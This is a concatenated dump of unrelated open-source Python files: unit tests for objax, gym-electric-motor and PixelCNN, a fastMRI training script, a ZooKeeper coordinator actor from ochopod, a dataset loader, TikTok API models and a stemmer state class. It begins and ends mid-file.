family_version=TRANSACTION_REQUEST_ACCOUNT_HANDLER_PARAMS.get('family_version'),
inputs=INPUTS,
outputs=OUTPUTS,
dependencies=[],
payload_sha512=hash512(data=serialized_transaction_payload),
batcher_public_key=RANDOM_NODE_PUBLIC_KEY,
nonce=time.time().hex().encode(),
)
serialized_header = transaction_header.SerializeToString()
transaction_request = TpProcessRequest(
header=transaction_header,
payload=serialized_transaction_payload,
signature=create_signer(private_key=BOT_PRIVATE_KEY).sign(serialized_header),
)
bot_account = Account()
bot_account.balance = 0
serialized_bot_account_balance = bot_account.SerializeToString()
swap_commission_setting = Setting()
swap_commission_setting.entries.add(key=SETTINGS_SWAP_COMMISSION, value=str(SWAP_COMMISSION_AMOUNT))
serialized_swap_commission_setting = swap_commission_setting.SerializeToString()
mock_context = StubContext(inputs=INPUTS, outputs=OUTPUTS, initial_state={
BLOCK_INFO_CONFIG_ADDRESS: SERIALIZED_BLOCK_INFO_CONFIG,
BLOCK_INFO_ADDRESS: SERIALIZED_BLOCK_INFO,
BOT_ADDRESS: serialized_bot_account_balance,
ADDRESS_TO_GET_SWAP_COMMISSION_AMOUNT_BY: serialized_swap_commission_setting,
})
with pytest.raises(InvalidTransaction) as error:
AtomicSwapHandler().apply(transaction=transaction_request, context=mock_context)
total_amount = TOKENS_AMOUNT_TO_SWAP + SWAP_COMMISSION_AMOUNT
assert f'Not enough balance to perform the transaction in the amount (with a commission) {total_amount}.' \
== str(error.value)
|
tests/tracing.py | kihyuks/objax | 715 | 12749308 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unitests for automatic variable tracing."""
import unittest
import numpy as np
import jax.numpy as jn
import objax
from objax.zoo.dnnet import DNNet
global_w = objax.TrainVar(jn.zeros(5))
global_b = objax.TrainVar(jn.zeros(1))
global_m = objax.nn.Sequential([objax.nn.Conv2D(2, 4, 3), objax.nn.BatchNorm2D(4)])
class TestTracing(unittest.TestCase):
"""Unit tests for variable tracing using."""
def test_function_global_vars(self):
def loss(x, y):
pred = jn.dot(x, global_w.value) + global_b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b})
def test_function_global_module(self):
def loss(x):
return jn.sum(global_m(x, training=True))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, global_m.vars(scope='global_m.'))
def test_function_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
def loss(x, y):
pred = jn.dot(x, w.value) + b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_function_closure_module(self):
m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)])
def loss(x):
return jn.sum(m(x, training=True))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, m.vars(scope='m.'))
def test_lambda_with_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
loss = lambda x, y: 0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_multiline_lambda_with_closure_vars(self):
w = objax.TrainVar(jn.zeros(5))
b = objax.TrainVar(jn.zeros(1))
loss = lambda x, y: (
0.5 * ((y - jn.dot(x, w.value) + b.value) ** 2).mean()
)
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'w': w, 'b': b})
def test_closure_overrides_global_vars(self):
# Make sure that global variables are what we expect them to be
np.testing.assert_allclose(global_w.value, np.zeros(5))
np.testing.assert_allclose(global_b.value, np.zeros(1))
def _do_test():
# define local variable with the same name as existing global
global_w = objax.TrainVar(jn.ones(10))
# verify that global_w and global_b are what we expect them to be
np.testing.assert_allclose(global_w.value, np.ones(10))
np.testing.assert_allclose(global_b.value, np.zeros(1))
            # loss function which mixes closure vars and global vars; the closure var hides the global one
def loss(x, y):
pred = jn.dot(x, global_w.value) + global_b.value
return 0.5 * ((y - pred) ** 2).mean()
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, {'global_w': global_w, 'global_b': global_b})
_do_test()
# Make sure that global variables didn't change, in other words
# that _do_test operated on local variables
np.testing.assert_allclose(global_w.value, np.zeros(5))
np.testing.assert_allclose(global_b.value, np.zeros(1))
def test_typical_training_loop(self):
# Define model and optimizer
model = DNNet((32, 10), objax.functional.leaky_relu)
opt = objax.optimizer.Momentum(model.vars(), nesterov=True)
# Predict op
predict_op = lambda x: objax.functional.softmax(model(x, training=False))
self.assertDictEqual(objax.util.find_used_variables(predict_op),
model.vars(scope='model.'))
# Loss function
def loss(x, label):
logit = model(x, training=True)
xe_loss = objax.functional.loss.cross_entropy_logits_sparse(logit, label).mean()
return xe_loss
self.assertDictEqual(objax.util.find_used_variables(loss),
model.vars(scope='model.'))
# Gradients and loss function
loss_gv = objax.GradValues(loss, objax.util.find_used_variables(loss))
def train_op(x, y, learning_rate):
grads, loss = loss_gv(x, y)
opt(learning_rate, grads)
return loss
self.assertDictEqual(objax.util.find_used_variables(train_op),
{**model.vars(scope='loss_gv.model.'), **opt.vars(scope='opt.')})
def test_lambda_inside_function(self):
m = objax.nn.Sequential([objax.nn.Conv2D(1, 2, 3), objax.nn.BatchNorm2D(2)])
def loss(x):
get_logits = lambda inp: m(inp, training=True)
return jn.sum(get_logits(x))
vc = objax.util.find_used_variables(loss)
self.assertDictEqual(vc, m.vars(scope='m.'))
if __name__ == '__main__':
unittest.main()
|
tests/test_physical_systems/test_physical_systems.py | RaviPandey33/gym-electric-motor-1 | 179 | 12749321 | import numpy as np
from ..testing_utils import DummyConverter, DummyLoad, DummyNoise, DummyOdeSolver, DummyVoltageSupply, DummyElectricMotor,\
mock_instantiate, instantiate_dict
from gym_electric_motor.physical_systems import physical_systems as ps, converters as cv, electric_motors as em,\
mechanical_loads as ml, voltage_supplies as vs, solvers as sv
from gym.spaces import Box
import pytest
class TestSCMLSystem:
"""
Base Class to test all PhysicalSystems that derive from SCMLSystem
"""
class_to_test = ps.SCMLSystem
def mock_build_state(self, motor_state, torque, u_in, u_sup):
"""Function to mock an arbitrary build_state function to test the SCMLSystem
"""
self.motor_state = motor_state
self.torque = torque
self.u_in = u_in
self.u_sup = u_sup
return np.concatenate((
self.motor_state[:len(DummyLoad.state_names)], [torque],
self.motor_state[len(DummyLoad.state_names):], [u_sup]
))
@pytest.fixture
def scml_system(self, monkeypatch):
"""
Returns an instantiated SCMLSystem with Dummy Components and mocked abstract functions
"""
monkeypatch.setattr(
self.class_to_test,
'_build_state_names',
lambda _:
DummyLoad.state_names + ['torque'] + DummyElectricMotor.CURRENTS + DummyElectricMotor.VOLTAGES + ['u_sup']
)
monkeypatch.setattr(
self.class_to_test,
'_build_state_space',
lambda _, state_names: Box(
low=np.zeros_like(state_names, dtype=float),
high=np.zeros_like(state_names, dtype=float)
)
)
return self.class_to_test(
converter=DummyConverter(),
motor=DummyElectricMotor(),
load=DummyLoad(),
supply=DummyVoltageSupply(),
ode_solver=DummyOdeSolver(),
noise_generator=DummyNoise()
)
def test_reset(self, scml_system):
"""Test the reset function in the physical system"""
scml_system._t = 12
scml_system._k = 33
state_space = scml_system.state_space
state_positions = scml_system.state_positions
initial_state = scml_system.reset()
target = (np.array([0, 0, 0, 0, 0, 0, 560]) + scml_system._noise_generator.reset()) / scml_system.limits
assert np.all(initial_state == target), 'Initial states of the system are incorrect'
assert scml_system._t == 0, 'Time of the system was not set to zero after reset'
assert scml_system._k == 0, 'Episode step of the system was not set to zero after reset'
assert scml_system.converter.reset_counter == scml_system.electrical_motor.reset_counter \
== scml_system.mechanical_load.reset_counter == scml_system.supply.reset_counter,\
'The reset was not passed to all components of the SCMLSystem'
assert scml_system._ode_solver.t == 0, 'The ode solver was not reset correctly'
assert all(scml_system._ode_solver.y == np.zeros_like(
scml_system.mechanical_load.state_names + scml_system.electrical_motor.CURRENTS, dtype=float
)), ' The ode solver was not reset correctly'
def test_system_equation(self, scml_system):
"""Tests the system equation function"""
state = np.random.rand(4)
currents = state[[2, 3]]
torque = scml_system.electrical_motor.torque(currents)
u_in = np.random.rand(2)
t = np.random.rand()
derivative = scml_system._system_equation(t, state, u_in)
assert all(
derivative == np.array([torque, -torque, currents[0] - u_in[0], currents[1] - u_in[1]])
), 'The system equation return differs from the expected'
assert scml_system.mechanical_load.t == t, 'The time t was not passed through to the mech. load equation'
assert np.all(scml_system.mechanical_load.mechanical_state == state[:2]),\
'The mech. state was not returned correctly'
def test_simulate(self, scml_system):
"""Test the simulation function of the SCMLSystem"""
# Reset the system and take a random action
scml_system.reset()
action = scml_system.action_space.sample()
        # Set a defined initial state
ode_state = np.array([3, 4, 5, 6])
scml_system._ode_solver.set_initial_value(ode_state)
# Perform the action on the system
next_state = scml_system.simulate(action)
solver_state_me = scml_system._ode_solver.y[:len(DummyLoad.state_names)]
solver_state_el = scml_system._ode_solver.y[len(DummyLoad.state_names):]
torque = [scml_system.electrical_motor.torque(solver_state_el)]
u_sup = [scml_system.supply.u_nominal]
u_in = [u * u_sup[0] for u in scml_system.converter.u_in]
# Calculate the next state
desired_next_state = (
np.concatenate((solver_state_me, torque, solver_state_el, u_in, u_sup))
+ scml_system._noise_generator.noise()
) / scml_system.limits
# Assertions for correct simulation
assert all(desired_next_state == next_state), 'The calculated next state differs from the expected one'
assert scml_system.converter.action == action, 'The action was not passed correctly to the converter'
        assert scml_system.converter.action_set_time == 0, 'The action start time was passed incorrectly to the converter'
assert scml_system.converter.last_i_out == scml_system.electrical_motor.i_in(scml_system._ode_solver.last_y[2:])
def test_system_jacobian(self, scml_system):
"""Tests for the system jacobian function"""
el_jac = np.arange(4).reshape(2, 2)
el_over_omega = np.arange(4, 6)
torque_over_el = np.arange(6, 8)
# Set the el. jacobian returns to specified values
scml_system.electrical_motor.electrical_jac_return = (el_jac, el_over_omega, torque_over_el)
me_jac = np.arange(8, 12).reshape(2, 2)
me_over_torque = np.arange(12, 14)
        # Set the mech. jacobian returns to specified values
scml_system.mechanical_load.mechanical_jac_return = me_jac, me_over_torque
sys_jac = scml_system._system_jacobian(0, np.array([0, 1, 2, 3]), [0, -1])
#
assert np.all(sys_jac[-2:, -2:] == el_jac), 'The el. jacobian is false'
assert np.all(sys_jac[:2, :2] == me_jac), 'The mech. jacobian is false'
assert np.all(sys_jac[2:, 0] == el_over_omega), 'the derivative of the el.state over omega is false'
assert np.all(sys_jac[2:, 1] == np.zeros(2))
assert np.all(sys_jac[:-2, 2:] == np.array([[72, 84], [78, 91]])), 'The derivative of the mech.state ' \
'over the currents is false'
|
fastmri_recon/training_scripts/single_coil/kikinet_sep_approach_af4_oasis.py | samiulshuvo/fastmri-reproducible-benchmark | 105 | 12749329 | import os.path as op
import random
import time
from keras.callbacks import TensorBoard, ModelCheckpoint, LearningRateScheduler
import tensorflow as tf
from tensorflow_addons.callbacks import TQDMProgressBar
from fastmri_recon.data.sequences.oasis_sequences import Masked2DSequence, KIKISequence
from fastmri_recon.models.functional_models.kiki_sep import kiki_sep_net
from fastmri_recon.models.utils.data_consistency import MultiplyScalar
from fastmri_recon.models.utils.non_linearities import lrelu
random.seed(0)
# paths
train_path = '/media/Zaccharie/UHRes/OASIS_data/'
n_train = 1000
n_val = 200
# generators
AF = 4
train_gen_last = Masked2DSequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, seed=0, val_split=0.1)
val_gen_last = train_gen_last.val_sequence
train_gen_last.filenames = random.sample(train_gen_last.filenames, n_train)
val_gen_last.filenames = random.sample(val_gen_last.filenames, n_val)
random.seed(0)
train_gen_i = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='I', seed=0, val_split=0.1)
val_gen_i = train_gen_i.val_sequence
train_gen_i.filenames = random.sample(train_gen_i.filenames, n_train)
val_gen_i.filenames = random.sample(val_gen_i.filenames, n_val)
random.seed(0)
train_gen_k = KIKISequence(train_path, af=AF, inner_slices=32, rand=True, scale_factor=1e-2, space='K', seed=0, val_split=0.1)
val_gen_k = train_gen_k.val_sequence
train_gen_k.filenames = random.sample(train_gen_k.filenames, n_train)
val_gen_k.filenames = random.sample(val_gen_k.filenames, n_val)
random.seed(0)
run_params = {
'n_convs': 16,
'n_filters': 48,
'noiseless': True,
'lr': 1e-3,
'activation': lrelu,
'input_size': (None, None, 1),
}
multiply_scalar = MultiplyScalar()
n_epochs = 50
def learning_rate_from_epoch(epoch):
return 10**(-(epoch // (n_epochs/3)) - 3)
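# Note (descriptive only): with n_epochs = 50 this schedule steps the learning
# rate down by a factor of 10 roughly every n_epochs/3 epochs: 1e-3 for epochs
# 0-16, 1e-4 for epochs 17-33 and 1e-5 for epochs 34-49.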
def train_model(model, space='K', n=1):
print(model.summary(line_length=150))
run_id = f'kikinet_sep_{space}{n}_af{AF}_oasis_{int(time.time())}'
chkpt_path = f'checkpoints/{run_id}' + '-{epoch:02d}.hdf5'
print(run_id)
chkpt_cback = ModelCheckpoint(chkpt_path, period=n_epochs//2)
log_dir = op.join('logs', run_id)
tboard_cback = TensorBoard(
profile_batch=0,
log_dir=log_dir,
histogram_freq=0,
write_graph=True,
write_images=False,
)
lrate_cback = LearningRateScheduler(learning_rate_from_epoch)
tqdm_cb = TQDMProgressBar()
if space == 'K':
train_gen = train_gen_k
val_gen = val_gen_k
elif space == 'I':
if n == 2:
train_gen = train_gen_last
val_gen = val_gen_last
elif n == 1:
train_gen = train_gen_i
val_gen = val_gen_i
model.fit_generator(
train_gen,
steps_per_epoch=n_train,
epochs=n_epochs,
validation_data=val_gen,
validation_steps=1,
verbose=0,
callbacks=[tqdm_cb, tboard_cback, chkpt_cback, lrate_cback,],
# max_queue_size=35,
use_multiprocessing=True,
workers=35,
shuffle=True,
)
return model
# first K net training
model = kiki_sep_net(None, multiply_scalar, to_add='K', last=False, **run_params)
train_model(model, space='K', n=1)
model = kiki_sep_net(model, multiply_scalar, to_add='I', last=False, **run_params)
train_model(model, space='I', n=1)
model = kiki_sep_net(model, multiply_scalar, to_add='K', last=False, **run_params)
train_model(model, space='K', n=2)
model = kiki_sep_net(model, multiply_scalar, to_add='I', last=True, fastmri=False, **run_params)
train_model(model, space='I', n=2)
|
ochopod/core/core.py | autodesk-cloud/ochopod | 139 | 12749350 | #
# Copyright (c) 2015 Autodesk Inc.
# All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import ochopod
import pykka
import time
import uuid
from flask import Flask, request
from kazoo.exceptions import ConnectionClosedError, NodeExistsError
from kazoo.client import KazooClient, KazooState
from kazoo.recipe.lock import LockTimeout
from ochopod.core.fsm import shutdown, spin_lock, Aborted, FSM
from pykka import ThreadingFuture, Timeout
from threading import Event
#: Our ochopod logger
logger = logging.getLogger('ochopod')
#: Root zookeeper node path (under which we store the pod data for each cluster). This path will prefix any node
#: we read or write (including the lock).
ROOT = '/ochopod/clusters'
#: We use the same tick for all our state-machines (namely one second). This quantity can be scaled up or
#: down depending on the actor
SAMPLING = 1.0
class ZK(FSM):
"""
Base layer dealing with zookeeper and in charge of writing the pod ephemeral node upon connection. The
reset() state will by default loop back to initial() and properly de-allocate the kazoo driver. Once connected
the machine will spin() until we raise something.
Please note we support an explicit reset request which will trip the machine. This is used from the CLI to
force a pod to completely disconnect/reconnect/reconfigure.
"""
def __init__(self, brokers, scope, tag, breadcrumbs, hints):
super(ZK, self).__init__()
self.breadcrumbs = breadcrumbs
self.connected = 0
self.brokers = brokers
self.force_reset = 0
self.hints = hints
self.hints['state'] = 'follower'
self.id = uuid.uuid4()
self.prefix = '%s/%s.%s' % (ROOT, scope, tag)
self.scope = scope
self.seq = None
self.tag = tag
def feedback(self, state):
#
# - forward the state change to the actor via a message
# - the specialized() hook will process this safely
#
self.actor_ref.tell(
{
'request': 'state change',
'state': state
})
def reset(self, data):
self.connected = 0
self.force_reset = 0
self.hints['state'] = 'follower'
logger.warning('%s : actor reset (%s)' % (self.path, data.cause))
if hasattr(data, 'zk'):
#
# - gracefully shut our client down
#
data.zk.stop()
logger.debug('%s : zk client stopped, releasing resources' % self.path)
data.zk.close()
if self.terminate:
super(ZK, self).reset(data)
return 'initial', data, 0
def initial(self, data):
#
# - setup a new kazoo client
#
cnx_string = ','.join(self.brokers)
logger.debug('%s : connecting @ %s' % (self.path, cnx_string))
data.zk = KazooClient(hosts=cnx_string, timeout=5.0, read_only=0, randomize_hosts=1)
data.zk.add_listener(self.feedback)
data.zk.start()
data.n = 0
return 'wait_for_cnx', data, 0
def wait_for_cnx(self, data):
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - loop back if we haven't received a CONNECTED event from the driver
#
if not self.connected:
return 'wait_for_cnx', data, SAMPLING
#
# - the /pods node holds all our ephemeral per-container data (one container == one child node)
# - the /hash node stores the last recorded md5 hash (local pods + dependencies), which we use to
# flag any change amongst the pods or their dependencies
#
data.zk.ensure_path('%s/pods' % self.prefix)
data.zk.ensure_path('%s/hash' % self.prefix)
try:
#
# - register ourselves by creating an ephemeral
# - this is where we can store arbitrary information (e.g our breadcrumbs)
# - we ask for a sequence counter as well which we then keep (e.g in case of connection loss or reset
# we guarantee the pod won't get assigned a new index)
# - this is *critical* for some use-cases (e.g Kafka where the broker index must remain the same)
#
path = data.zk.create('%s/pods/%s.' % (self.prefix, self.id), ephemeral=True, sequence=True)
tokens = path.split('.')
if self.seq is None:
self.seq = int(tokens[-1])
self.breadcrumbs['seq'] = self.seq
js = json.dumps(self.breadcrumbs)
data.zk.set(path, js)
except NodeExistsError:
#
# - if the node is already there we just recovered from a zookeeper connection loss
# and /snapshot has not been phased out yet .. this is not an issue, simply pause a bit
# to re-attempt later
#
logger.debug('%s : pod %s is already there (probably a zk reconnect)' % (self.path, self.id))
return 'wait_for_cnx', data, 5.0 * SAMPLING
logger.debug('%s : registered as %s (#%d)' % (self.path, self.id, self.seq))
data.connected_at = time.time()
return 'spin', data, 0
def spin(self, data):
raise NotImplementedError
def specialized(self, msg):
assert 'request' in msg, 'bogus message received ?'
req = msg['request']
if req == 'state change':
#
# - we got a zk state change
# - we only use the switch to CONNECTED to go from wait_for_cnx() to spin()
# - ZK disconnects (LOST or SUSPENDED) are simply flagged when exceptions are raised
#
state = msg['state']
current = 'connected' if self.connected else 'disconnected'
logger.debug('%s : zk state change -> "%s" (%s)' % (self.path, str(state), current))
if self.connected and state != KazooState.CONNECTED:
logger.warning('%s : lost connection (%s) / forcing a reset' % (self.path, str(state)))
self.force_reset = 1
self.connected = 0
elif state == KazooState.CONNECTED:
self.connected = 1
elif req == 'reset':
#
# - we got a request to explicitly force a reset
# - this is typically invoked from the CLI
#
self.force_reset = 1
else:
super(ZK, self).specialized(msg)
class Coordinator(ZK):
"""
Leader lock implementation logic, based on :class:`ZK`. The spin() state will attempt to grab a lock (we
simply use the Kazoo recipe). If we obtain the lock we boot the controller actor (e.g the clustering model)
and then stay there by spin-locking on its latch. If the controller goes down for any reason (typically a
zookeeper error or a shutdown request) we'll reset (and disconnect from zookeeper).
"""
def __init__(self, brokers, scope, tag, port, breadcrumbs, model, hints):
super(Coordinator, self).__init__(brokers, scope, tag, breadcrumbs, hints)
self.model = model
self.path = 'coordinator'
self.port = port
def reset(self, data):
if hasattr(data, 'controller'):
#
# - don't forget to nuke our controller before resetting
#
shutdown(data.controller)
if hasattr(data, 'lock'):
#
# - make sure to remove the lock attribute
# - it's useless to release the lock as we'll release the client altogether
#
delattr(data, 'lock')
return super(Coordinator, self).reset(data)
def spin(self, data):
#
# - if the termination trigger is set, abort immediately
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - attempt to fetch the lock
# - allocate it if not already done
# - it is *important* to just allocate one lock as there is a leak in kazoo
#
if not hasattr(data, 'lock'):
data.lock = data.zk.Lock('%s/coordinator' % self.prefix)
try:
#
# - attempt to lock within a 5 seconds timeout to avoid stalling in some cases
#
if data.lock.acquire(timeout=5.0 * SAMPLING):
return 'start_controller', data, 0
except LockTimeout:
pass
return 'spin', data, 0
def start_controller(self, data):
#
# - if the termination trigger is set, abort immediately
# - this is important as it is possible to somehow get the lock after a suspend (acquire() returns
# true in that case which is misleading)
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - we have the lock (e.g we are the leader)
# - start the controller actor
#
data.latch = ThreadingFuture()
logger.debug('%s : lock acquired @ %s, now leading' % (self.path, self.prefix))
data.controller = self.model.start(data.zk, self.id, self.hints, self.scope, self.tag, self.port, data.latch)
return 'lock', data, 0
def lock(self, data):
#
# - if the termination trigger is set, abort immediately
#
if self.force_reset or self.terminate:
raise Aborted('resetting')
#
# - spin-lock on the controller latch
# - any catastrophic plug failure will be trapped that way
#
try:
Event()
out = data.latch.get(SAMPLING)
if isinstance(out, Exception):
raise out
except Timeout:
pass
return 'lock', data, 0 |
observations/r/bmt.py | hajime9652/observations | 199 | 12749367 | <filename>observations/r/bmt.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def bmt(path):
"""data from Section 1.3
The `bmt` data frame has 137 rows and 22 columns.
This data frame contains the following columns:
group
Disease Group 1-ALL, 2-AML Low Risk, 3-AML High Risk
t1
Time To Death Or On Study Time
t2
Disease Free Survival Time (Time To Relapse, Death Or End Of Study)
d1
Death Indicator 1-Dead 0-Alive
d2
Relapse Indicator 1-Relapsed, 0-Disease Free
d3
Disease Free Survival Indicator 1-Dead Or Relapsed, 0-Alive Disease
      Free
ta
Time To Acute Graft-Versus-Host Disease
da
Acute GVHD Indicator 1-Developed Acute GVHD 0-Never Developed Acute
      GVHD
tc
Time To Chronic Graft-Versus-Host Disease
dc
Chronic GVHD Indicator 1-Developed Chronic GVHD 0-Never Developed
Chronic GVHD
tp
      Time To Platelet Recovery
dp
Platelet Recovery Indicator 1-Platelets Returned To Normal,
0-Platelets Never Returned to Normal
z1
Patient Age In Years
z2
Donor Age In Years
z3
Patient Sex: 1-Male, 0-Female
z4
Donor Sex: 1-Male, 0-Female
z5
Patient CMV Status: 1-CMV Positive, 0-CMV Negative
z6
Donor CMV Status: 1-CMV Positive, 0-CMV Negative
z7
Waiting Time to Transplant In Days
z8
FAB: 1-FAB Grade 4 Or 5 and AML, 0-Otherwise
z9
Hospital: 1-The Ohio State University, 2-Alferd , 3-St. Vincent,
4-Hahnemann
z10
MTX Used as a Graft-Versus-Host- Prophylactic: 1-Yes 0-No
  Klein and Moeschberger (1997) *Survival Analysis: Techniques for Censored
  and Truncated Data*, Springer.
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `bmt.csv`.
Returns:
Tuple of np.ndarray `x_train` with 137 rows and 22 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'bmt.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/KMsurv/bmt.csv'
maybe_download_and_extract(path, url,
save_file_name='bmt.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
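# A minimal usage sketch (illustrative; the first call downloads bmt.csv into
# the given directory, so network access is assumed):
#
#   from observations import bmt
#
#   x_train, metadata = bmt('~/data')
#   print(x_train.shape)           # expected (137, 22)
#   print(list(metadata['columns'])[:5])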
|
tiktok_bot/models/post.py | reliefs/tiktok_bot | 118 | 12749384 | <filename>tiktok_bot/models/post.py
from typing import List, Optional
from pydantic import BaseModel
from .music import MusicTrack
from .request import (
BaseResponseData,
CursorOffsetRequestParams,
CursorOffsetResponseParams,
ListRequestParams,
ListResponseData,
)
from .user import CommonUserDetails
from .video import Video
class PostStatistics(BaseModel):
# The ID of the post
aweme_id: str
# The number of comments on the post
comment_count: int
# The number of times the post has been liked
digg_count: int
# The number of times the post has been forwarded (looks unused?)
forward_count: Optional[int]
# The number of times the post has been viewed - doesn't appear to be public, so always 0
play_count: int
# The number of times the post has been shared
share_count: int
class PostStatus(BaseModel):
# True if the post allows comments
allow_comment: bool
# True if the post allows sharing
allow_share: bool
# 0 if the post can be downloaded
download_status: int
# True if the post is currently being reviewed
in_reviewing: Optional[bool]
# True if the post has been deleted
is_delete: bool
# True if the post is private
is_private: bool
# True if the post contains content that is not allowed on the platform
is_prohibited: Optional[bool]
# 0 if the post is public
private_status: Optional[int]
# 1 if the post has been reviewed
reviewed: Optional[int]
class PostTags(BaseModel):
# 0 if the tag is for a user; 1 if the tag is for a hashtag
type: int
# The name of the hashtag
hashtag_name: Optional[str]
# The ID of the tagged user
user_id: Optional[str]
class RiskInfo(BaseModel):
# The text shown if the post has been flagged
content: str
# ???
risk_sink: bool = False
# The risk type associated with the post - 0 if no risk; 1 if low; 2 if high
type: int
# ??? - only present if the post has been flagged
vote: Optional[bool]
# True if a warning should be shown to the user
warn: bool
class ShareInfo(BaseModel):
# ???
bool_persist: Optional[int]
# The description used when sharing (if set)
share_desc: str
# The description used when sharing a link only (if set)
share_link_desc: Optional[str]
# The quote used when sharing (if set)
share_quote: Optional[str]
# The signature used when sharing (if set)
share_signature_desc: Optional[str]
# The signature URL used when sharing (if set)
share_signature_url: Optional[str]
# The title used when sharing
share_title: str
# The link to share
share_url: str
# The description used when sharing on Weibo
share_weibo_desc: str
class StickerInfo(BaseModel):
# The ID of the sticker, e.g. 22094
id: str
# The display name of the sticker, e.g. Long Face
name: str
class Post(BaseModel):
# Details about the author
author: Optional[CommonUserDetails]
# The ID of the author
author_user_id: str
# The ID of the post
aweme_id: str
# The type of post - 0 for a musical.ly
aweme_type: int
# The timestamp in seconds when the post was created
create_time: int
# A description of the post
desc: str
# Details about the music used in the post
music: Optional[MusicTrack]
# True if the end user should not be provided the option to download the video
prevent_download: Optional[bool]
# An age rating for the post, e.g. 12
rate: int
# The 2-letter region the post was created in, e.g. US
region: str
# Risk information about the post
risk_infos: Optional[RiskInfo]
# Information used when sharing the post
share_info: Optional[ShareInfo]
# A link to the video on the musical.ly website that is used when sharing
share_url: str
# Statistics about the post
statistics: PostStatistics
# Status information about the post
status: PostStatus
# Information about the sticker used in the post
sticker_detail: Optional[StickerInfo]
# The ID of the sticker used in the post (looks to be deprecated by sticker_detail)
stickers: Optional[str]
# Tagged users and hashtags used in the description
text_extra: List[PostTags]
# 1 if the logged in user has liked this post
user_digged: int
# Details about the video in the post
video: Video
@property
def video_url(self):
url = filter(lambda url: "watermark" in url, self.video.download_addr.url_list)
return next(url)
@property
def video_url_without_watermark(self):
return self.video_url.replace("watermark=1", "watermark=0")
class GetPostResponse(BaseResponseData):
aweme_detail: Post
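# Illustrative only (assumes pydantic v1-style parsing of a raw API response
# dict named ``raw_response``):
#
#   post = GetPostResponse.parse_obj(raw_response).aweme_detail
#   url = post.video_url_without_watermark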
class ListPostsRequest(ListRequestParams, CursorOffsetRequestParams):
# The id of the user whose posts to retrieve
user_id: str
class ListPostsResponse(ListResponseData, CursorOffsetResponseParams):
aweme_list: List[Post]
|
preprocessing/TRStemmer/states/__init__.py | ucekmez/summarizer | 205 | 12749387 | from ..transitions import Transition
from ..suffixes import *
__all__ = ["State"]
class State(object):
def __init__(self, initialState, finalState, *suffixes):
self.initialState = initialState
self.finalState = finalState
if suffixes is None:
self.suffixes = ()
else:
self.suffixes = suffixes
def AddTransitions(self, word, transitions, marked):
for suffix in self.suffixes:
if suffix.Match(word):
transitions.append(Transition(self, self.NextState(suffix), word, suffix, marked))
def NextState(self, suffix):
raise NotImplementedError("Feature is not implemented.") |
examples/pixelcnn/model_test.py | navjotts/flax | 2,249 | 12749392 | <gh_stars>1000+
# Copyright 2021 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for PixelCNN Modules."""
import pixelcnn
from flax import linen as nn
from absl.testing import absltest
from absl.testing import parameterized
import numpy.testing as np_testing
from jax import random
import jax.numpy as np
from jax.config import config
class ModelTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.rng = random.PRNGKey(0)
self.x = np.arange(24).reshape(1, 4, 3, 2)
def get_weightnorm(self, params):
return [params[k] for k in ('direction', 'scale', 'bias')]
def assert_mean_and_variance(self, out):
# Weightnorm should ensure that, at initialization time, the outputs of the
# module have mean 0 and variance 1 over the non-feature dimensions.
np_testing.assert_allclose(np.mean(out, (0, 1, 2)), 0., atol=1e-5)
np_testing.assert_allclose(np.var(out, (0, 1, 2)), 1., atol=1e-5)
def test_conv(self):
model = pixelcnn.ConvWeightNorm(features=4, kernel_size=(3, 2))
